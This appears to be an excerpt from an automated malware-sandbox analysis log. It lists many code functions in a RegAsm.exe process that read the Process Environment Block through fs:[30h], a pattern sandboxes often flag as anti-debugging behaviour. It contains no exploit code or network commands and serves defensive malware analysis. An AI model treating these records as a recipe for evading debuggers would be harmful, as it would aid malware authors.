Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E5CF mov eax, dword ptr fs:[00000030h] 1_2_0288E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E5CF mov eax, dword ptr fs:[00000030h] 1_2_0288E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028565D0 mov eax, dword ptr fs:[00000030h] 1_2_028565D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0288A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0288A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0287E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028525E0 mov eax, dword ptr fs:[00000030h] 1_2_028525E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C5ED mov eax, dword ptr fs:[00000030h] 1_2_0288C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C5ED mov eax, dword ptr fs:[00000030h] 1_2_0288C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E6500 mov eax, dword ptr fs:[00000030h] 1_2_028E6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924500 mov eax, dword ptr fs:[00000030h] 1_2_02924500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924500 mov eax, dword ptr fs:[00000030h] 1_2_02924500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924500 mov eax, dword ptr fs:[00000030h] 1_2_02924500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924500 mov eax, dword ptr fs:[00000030h] 1_2_02924500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924500 mov eax, dword ptr fs:[00000030h] 1_2_02924500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924500 mov eax, dword ptr fs:[00000030h] 1_2_02924500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924500 mov eax, dword ptr fs:[00000030h] 1_2_02924500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860535 mov eax, dword ptr fs:[00000030h] 1_2_02860535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860535 mov eax, dword ptr fs:[00000030h] 1_2_02860535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860535 mov eax, dword ptr fs:[00000030h] 1_2_02860535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860535 mov eax, dword ptr fs:[00000030h] 1_2_02860535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860535 mov eax, dword ptr fs:[00000030h] 1_2_02860535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860535 mov eax, dword ptr fs:[00000030h] 1_2_02860535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h] 1_2_0287E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h] 1_2_0287E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h] 1_2_0287E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h] 1_2_0287E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h] 1_2_0287E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858550 mov eax, dword ptr fs:[00000030h] 1_2_02858550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858550 mov eax, dword ptr fs:[00000030h] 1_2_02858550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288656A mov eax, dword ptr fs:[00000030h] 1_2_0288656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288656A mov eax, dword ptr fs:[00000030h] 1_2_0288656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288656A mov eax, dword ptr fs:[00000030h] 1_2_0288656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h] 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924A80 mov eax, dword ptr fs:[00000030h] 1_2_02924A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02888A90 mov edx, dword ptr fs:[00000030h] 1_2_02888A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858AA0 mov eax, dword ptr fs:[00000030h] 1_2_02858AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858AA0 mov eax, dword ptr fs:[00000030h] 1_2_02858AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A6AA4 mov eax, dword ptr fs:[00000030h] 1_2_028A6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h] 1_2_028A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h] 1_2_028A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h] 1_2_028A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850AD0 mov eax, dword ptr fs:[00000030h] 1_2_02850AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02884AD0 mov eax, dword ptr fs:[00000030h] 1_2_02884AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02884AD0 mov eax, dword ptr fs:[00000030h] 1_2_02884AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288AAEE mov eax, dword ptr fs:[00000030h] 1_2_0288AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288AAEE mov eax, dword ptr fs:[00000030h] 1_2_0288AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DCA11 mov eax, dword ptr fs:[00000030h] 1_2_028DCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287EA2E mov eax, dword ptr fs:[00000030h] 1_2_0287EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288CA24 mov eax, dword ptr fs:[00000030h] 1_2_0288CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02874A35 mov eax, dword ptr fs:[00000030h] 1_2_02874A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02874A35 mov eax, dword ptr fs:[00000030h] 1_2_02874A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h] 1_2_02856A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h] 1_2_02856A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h] 1_2_02856A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h] 1_2_02856A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h] 1_2_02856A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h] 1_2_02856A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h] 1_2_02856A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860A5B mov eax, dword ptr fs:[00000030h] 1_2_02860A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860A5B mov eax, dword ptr fs:[00000030h] 1_2_02860A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288CA6F mov eax, dword ptr fs:[00000030h] 1_2_0288CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288CA6F mov eax, dword ptr fs:[00000030h] 1_2_0288CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288CA6F mov eax, dword ptr fs:[00000030h] 1_2_0288CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FEA60 mov eax, dword ptr fs:[00000030h] 1_2_028FEA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CCA72 mov eax, dword ptr fs:[00000030h] 1_2_028CCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CCA72 mov eax, dword ptr fs:[00000030h] 1_2_028CCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02904BB0 mov eax, dword ptr fs:[00000030h] 1_2_02904BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02904BB0 mov eax, dword ptr fs:[00000030h] 1_2_02904BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860BBE mov eax, dword ptr fs:[00000030h] 1_2_02860BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860BBE mov eax, dword ptr fs:[00000030h] 1_2_02860BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850BCD mov eax, dword ptr fs:[00000030h] 1_2_02850BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850BCD mov eax, dword ptr fs:[00000030h] 1_2_02850BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850BCD mov eax, dword ptr fs:[00000030h] 1_2_02850BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02870BCB mov eax, dword ptr fs:[00000030h] 1_2_02870BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02870BCB mov eax, dword ptr fs:[00000030h] 1_2_02870BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02870BCB mov eax, dword ptr fs:[00000030h] 1_2_02870BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FEBD0 mov eax, dword ptr fs:[00000030h] 1_2_028FEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858BF0 mov eax, dword ptr fs:[00000030h] 1_2_02858BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858BF0 mov eax, dword ptr fs:[00000030h] 1_2_02858BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02858BF0 mov eax, dword ptr fs:[00000030h] 1_2_02858BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287EBFC mov eax, dword ptr fs:[00000030h] 1_2_0287EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DCBF0 mov eax, dword ptr fs:[00000030h] 1_2_028DCBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h] 1_2_028CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02924B00 mov eax, dword ptr fs:[00000030h] 1_2_02924B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287EB20 mov eax, dword ptr fs:[00000030h] 1_2_0287EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287EB20 mov eax, dword ptr fs:[00000030h] 1_2_0287EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02918B28 mov eax, dword ptr fs:[00000030h] 1_2_02918B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02918B28 mov eax, dword ptr fs:[00000030h] 1_2_02918B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h] 1_2_02922B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h] 1_2_02922B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h] 1_2_02922B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h] 1_2_02922B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F8B42 mov eax, dword ptr fs:[00000030h] 1_2_028F8B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E6B40 mov eax, dword ptr fs:[00000030h] 1_2_028E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E6B40 mov eax, dword ptr fs:[00000030h] 1_2_028E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291AB40 mov eax, dword ptr fs:[00000030h] 1_2_0291AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02848B50 mov eax, dword ptr fs:[00000030h] 1_2_02848B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02904B4B mov eax, dword ptr fs:[00000030h] 1_2_02904B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02904B4B mov eax, dword ptr fs:[00000030h] 1_2_02904B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FEB50 mov eax, dword ptr fs:[00000030h] 1_2_028FEB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284CB7E mov eax, dword ptr fs:[00000030h] 1_2_0284CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850887 mov eax, dword ptr fs:[00000030h] 1_2_02850887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DC89D mov eax, dword ptr fs:[00000030h] 1_2_028DC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287E8C0 mov eax, dword ptr fs:[00000030h] 1_2_0287E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029208C0 mov eax, dword ptr fs:[00000030h] 1_2_029208C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C8F9 mov eax, dword ptr fs:[00000030h] 1_2_0288C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288C8F9 mov eax, dword ptr fs:[00000030h] 1_2_0288C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291A8E4 mov eax, dword ptr fs:[00000030h] 1_2_0291A8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DC810 mov eax, dword ptr fs:[00000030h] 1_2_028DC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02872835 mov eax, dword ptr fs:[00000030h] 1_2_02872835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02872835 mov eax, dword ptr fs:[00000030h] 1_2_02872835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02872835 mov eax, dword ptr fs:[00000030h] 1_2_02872835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02872835 mov ecx, dword ptr fs:[00000030h] 1_2_02872835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02872835 mov eax, dword ptr fs:[00000030h] 1_2_02872835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02872835 mov eax, dword ptr fs:[00000030h] 1_2_02872835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F483A mov eax, dword ptr fs:[00000030h] 1_2_028F483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F483A mov eax, dword ptr fs:[00000030h] 1_2_028F483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A830 mov eax, dword ptr fs:[00000030h] 1_2_0288A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02862840 mov ecx, dword ptr fs:[00000030h] 1_2_02862840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02854859 mov eax, dword ptr fs:[00000030h] 1_2_02854859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02854859 mov eax, dword ptr fs:[00000030h] 1_2_02854859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02880854 mov eax, dword ptr fs:[00000030h] 1_2_02880854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E6870 mov eax, dword ptr fs:[00000030h] 1_2_028E6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E6870 mov eax, dword ptr fs:[00000030h] 1_2_028E6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DE872 mov eax, dword ptr fs:[00000030h] 1_2_028DE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DE872 mov eax, dword ptr fs:[00000030h] 1_2_028DE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h] 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028509AD mov eax, dword ptr fs:[00000030h] 1_2_028509AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028509AD mov eax, dword ptr fs:[00000030h] 1_2_028509AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D89B3 mov esi, dword ptr fs:[00000030h] 1_2_028D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D89B3 mov eax, dword ptr fs:[00000030h] 1_2_028D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D89B3 mov eax, dword ptr fs:[00000030h] 1_2_028D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291A9D3 mov eax, dword ptr fs:[00000030h] 1_2_0291A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E69C0 mov eax, dword ptr fs:[00000030h] 1_2_028E69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0285A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0285A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0285A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0285A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0285A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0285A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028849D0 mov eax, dword ptr fs:[00000030h] 1_2_028849D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DE9E0 mov eax, dword ptr fs:[00000030h] 1_2_028DE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028829F9 mov eax, dword ptr fs:[00000030h] 1_2_028829F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028829F9 mov eax, dword ptr fs:[00000030h] 1_2_028829F9
